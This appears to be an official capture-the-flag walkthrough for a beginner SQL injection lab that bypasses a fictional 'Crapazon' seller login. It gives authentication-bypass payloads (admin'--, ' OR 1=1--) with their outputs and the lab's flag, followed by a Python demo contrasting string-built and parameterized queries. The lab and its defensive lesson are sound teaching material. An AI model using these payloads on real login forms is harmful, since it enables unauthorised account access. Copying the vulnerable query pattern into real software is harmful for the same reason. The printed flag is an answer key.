HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Seller Login — Crapazon

SQL Injection Basics · SQL Injection (Authentication Bypass)
Difficulty
Beginner
Vuln class
SQL Injection (Authentication Bypass)
Steps
5
// Objective
Bypass the Crapazon seller login form using SQL injection to gain access without valid credentials.
// Tools required
Browser, Burp Suite (optional)
// Step-by-step walkthrough
1
Identify the target
The seller portal has a standard username and password login form. The backend constructs a SQL query using your input directly. Your goal is to manipulate that query.
2
Test the input for SQL injection
Enter a single quote in the username field and submit. A SQL error or unexpected behaviour confirms the input is being inserted raw into a query.
Command / Input
Username: '
Output
SQL syntax error near "''' AND password = ''" — confirms SQL injection.
3
Understand the query structure
The backend query is likely: SELECT * FROM sellers WHERE username = '{username}' AND password = '{password}' Both fields are concatenated into the string as typed, so the username field controls everything that follows it. Your goal is to make the WHERE clause return a row regardless of the password, either by commenting out the password check or by making the whole condition always true.
4
Craft the bypass payload
The classic auth bypass: close the string with a quote, then comment out the rest of the query with -- so the password comparison never runs. The username you supply before the quote is the account you log in as.
Command / Input
Username: admin'--
Password: anything
Output
Executed query: SELECT * FROM sellers WHERE username = 'admin'--' AND password = 'anything'
The -- comments out the password check, so the query reduces to username = 'admin'. If admin exists, you're in. Caveat: on MySQL the -- comment marker needs a trailing space (admin'-- ), or use # instead; SQLite and PostgreSQL accept the bare --.
5
Alternative: OR bypass
If admin doesn't exist, use OR 1=1 to match any row — you'll log in as the first seller in the database.
Command / Input
Username: ' OR 1=1--
Password: anything
Output
Login successful. Flag revealed: HackrGG{sql1_byp4ss_s3ll3r_p0rt4l}
OR 1=1 makes the WHERE clause always evaluate to true, returning the first row from the sellers table regardless of credentials.
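To see both payloads from steps 4 and 5 succeed against string-built SQL and fail against a parameterized query, here is an added example that is not part of the walkthrough or the Crapazon application. It runs against an in-memory SQLite database with a constructed sellers table (the table layout, the two seller rows and the helper names are assumptions for the demo; real backends store password hashes, not plaintext).

```python
"""Vulnerable vs. parameterized seller login, demonstrated against SQLite.

Added example: the sellers table, its rows and the function names are
assumptions made for this demo, not the Crapazon backend.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two sellers, alice inserted first."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sellers (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Plaintext passwords only so the demo stays self-contained.
    conn.executemany(
        "INSERT INTO sellers (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("admin", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the WHERE clause by string formatting: the pattern the walkthrough exploits.

    Returns ("ok", username) on a matching row, ("denied", None) on no row,
    or ("error", message) when the injected input breaks the SQL syntax.
    """
    query = (
        f"SELECT username FROM sellers WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError as exc:
        # The lone single-quote probe from step 2 ends up here: the string
        # literal is left unterminated and the parser rejects the statement.
        return ("error", str(exc))
    return ("ok", row[0]) if row else ("denied", None)


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the driver passes user input as data, never as SQL text."""
    row = conn.execute(
        "SELECT username FROM sellers WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return ("ok", row[0]) if row else ("denied", None)


if __name__ == "__main__":
    db = make_db()
    probes = [
        ("'", ""),                  # step 2: syntax error confirms injection
        ("admin'--", "anything"),   # step 4: comment out the password check
        ("' OR 1=1--", "anything"), # step 5: always-true clause, first row wins
    ]
    for user, pw in probes:
        print(f"{user!r:16} vulnerable={login_vulnerable(db, user, pw)} "
              f"safe={login_safe(db, user, pw)}")
```

With the vulnerable function the quote probe raises a syntax error, admin'-- logs in as admin, and ' OR 1=1-- logs in as alice because she is the first row the database returns. The parameterized version denies all three, because the placeholders bind the payloads as literal strings that match no username.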
// Flag
Flag value
HackrGG{sql1_byp4ss_s3ll3r_p0rt4l}
Revealed in the seller dashboard after successful authentication bypass.